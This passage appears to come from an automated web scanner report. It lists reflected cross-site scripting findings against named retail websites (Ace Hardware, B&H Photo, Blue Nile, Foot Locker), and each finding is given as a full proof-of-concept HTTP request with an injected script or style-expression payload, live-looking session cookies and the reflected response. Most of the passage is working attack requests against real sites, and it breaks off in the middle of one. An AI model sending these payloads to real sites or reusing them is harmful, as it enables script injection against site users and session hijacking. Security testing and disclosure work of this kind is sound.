The value of the rdir request parameter is copied into an HTML comment. The payload 25276--><script>alert(1)</script>ccb31578d5a was submitted in the rdir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?rdir=1A25276--><script>alert(1)</script>ccb31578d5a HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305544625524%3B; JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<!-- === Request Query String: rdir=1A25276--><script>alert(1)</script>ccb31578d5a -->
...[SNIP]...

5.53. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bhphotovideo.com
Path:   /c/buy/Camcorders-Housings/ci/16479/N/4267396714

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2542d"><a>b6abcdf389d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c/buy/Camcorders-Housings/ci/164792542d"><a>b6abcdf389d/N/4267396714 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541028965&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:36:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS29f0cc=b0d1ad0ba7546d6b2b5b7e9034b704ed871d7ea6dc67d58e4dd0fe2f60ac0ec569178bf8b092ce85bc587bdd; Path=/
Content-Length: 197632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-
...[SNIP]...
<a href="http://www.bhphotovideo.com/c/buy/Camcorders-Housings/pn/15/ci/164792542d"><a>b6abcdf389d/N/4267396714">
...[SNIP]...

5.54. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bhphotovideo.com
Path:   /c/buy/Camcorders-Housings/ci/16479/N/4267396714

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fb38f'><a>2ecfd8f2719 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c/buy/Camcorders-Housings/ci/16479fb38f'><a>2ecfd8f2719/N/4267396714 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541028965&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:40 GMT
Connection: close
Set-Cookie: TS29f0cc=ae3fe2cae9d870f2a3b02425c0e4c166871d7ea6dc67d58e4dd0fe3760ac0ec569178bf8b092ce85bc587bdd; Path=/
Content-Length: 197632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-
...[SNIP]...
<a href='http://www.bhphotovideo.com/c/buy/Camcorders-Housings/pn/2/ci/16479fb38f'><a>2ecfd8f2719/N/4267396714'>
...[SNIP]...

5.55. http://www.bluenile.com/build-your-own-diamond-ring [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /build-your-own-diamond-ring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75463"style%3d"x%3aexpression(alert(1))"25b680a7acd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75463"style="x:expression(alert(1))"25b680a7acd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more&75463"style%3d"x%3aexpression(alert(1))"25b680a7acd=1 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:37:54 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:37:43 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:37:43 GMT; Path=/
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:37:43 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220459

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...
<meta http-equiv="refresh" content="0;url=/build-your-own-diamond-ring?75463"style="x:expression(alert(1))"25b680a7acd=1&track=more&first_step=diamond&forceStep=DIAMONDS_STEP&mode=BASIC&reason=noscript" />
...[SNIP]...

5.56. http://www.footlocker.com/login/login.cfm [bv_AA_enabled parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 529c3"style%3d"x%3aexpression(alert(1))"362edd0e270 was submitted in the bv_AA_enabled parameter. This input was echoed as 529c3"style="x:expression(alert(1))"362edd0e270 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=529c3"style%3d"x%3aexpression(alert(1))"362edd0e270&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:31 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:31 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:31 GMT;path=/
Content-Length: 239


   <iframe src="http://www.footlocker.com/login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=529c3"style="x:expression(alert(1))"362edd0e270&dontRunBV=true" width="250" height="185" frameborder="0" scrolling="no">
...[SNIP]...

5.57. http://www.footlocker.com/login/login.cfm [bv_RR_enabled parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login.cfm

Issue detail

The value of the bv_RR_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327b2"style%3d"x%3aexpression(alert(1))"aca39a4f38b was submitted in the bv_RR_enabled parameter. This input was echoed as 327b2"style="x:expression(alert(1))"aca39a4f38b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=327b2"style%3d"x%3aexpression(alert(1))"aca39a4f38b&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:30 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:30 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:30 GMT;path=/
Content-Length: 239


   <iframe src="http://www.footlocker.com/login/login_form.cfm?secured=false&bv_RR_enabled=327b2"style="x:expression(alert(1))"aca39a4f38b&bv_AA_enabled=true&dontRunBV=true" width="250" height="185" frameborder="0" scrolling="no">
...[SNIP]...

5.58. http://www.footlocker.com/login/login_forgotpassword.cfm [bv_AA_enabled parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_forgotpassword.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 361dd"style%3d"x%3aexpression(alert(1))"9d00252baee was submitted in the bv_AA_enabled parameter. This input was echoed as 361dd"style="x:expression(alert(1))"9d00252baee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /login/login_forgotpassword.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true361dd"style%3d"x%3aexpression(alert(1))"9d00252baee HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:42 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:42 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:42 GMT;path=/
Content-Length: 2836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form action="https://www.footlocker.com/login/login_forgotpassword_action.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true361dd"style="x:expression(alert(1))"9d00252baee" method="post">
...[SNIP]...

5.59. http://www.footlocker.com/login/login_form.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 526f0"><script>alert(1)</script>8748cce5433 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/login_form.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E526f0"><script>alert(1)</script>8748cce5433 HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
